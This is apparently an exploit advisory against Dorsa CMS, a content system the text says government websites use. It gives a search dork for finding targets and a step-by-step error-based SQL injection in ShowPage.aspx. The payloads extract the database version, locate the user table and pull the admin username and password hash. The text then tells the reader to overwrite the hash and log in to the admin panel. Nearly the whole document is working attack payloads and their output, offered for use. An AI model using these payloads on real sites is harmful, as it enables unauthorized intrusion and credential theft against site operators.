Portal Name: Dorsa CMS
Vendor : http://www.dorsacms.com
Description : A CMS written by iranian programmers which uses by governmental websites.
Vulnerable File : ShowPage.aspx
Dork: Powered by DorsaCms
Author : syst3m_f4ult && Y!ID : autumn_love6
How to exploit :
a live example :
http://www.xxx.ir/ShowPage.aspx?page_=news〈=1&tempname=fire⊂=0&PageID=36&PageIDF=2
Testing injection :
http://www.xxx.ir/ShowPage.aspx?page_=news〈=1&tempname=fire⊂=0&PageID=36&PageIDF=2 or 1=convert(int,@@version)--
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise ...
Easiest way is to search it:
http://www.xxx.ir/ShowPage.aspx?page_=news〈=1&tempname=fire⊂=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--
table_name = Seller
Its not that table we are seeking, so we keep on:
http://www.xxx.ir/ShowPage.aspx?page_=news〈=1&tempname=fire⊂=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--
Bingo
Table_name = USER_
Start to get username and pass from USER_:
http://www.xxx.ir/ShowPage.aspx?page_=news〈=1&tempname=fire⊂=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))
user : admin
pass : kaBY/8jRC+XbjSIIDhsHFmOX1B2pDd
Update hash to a hash you know its decode and enjoy.
login to portal :
http://www.xxx.ir/Dorsapax/Signin.aspx
ref. milw0rm.com</span>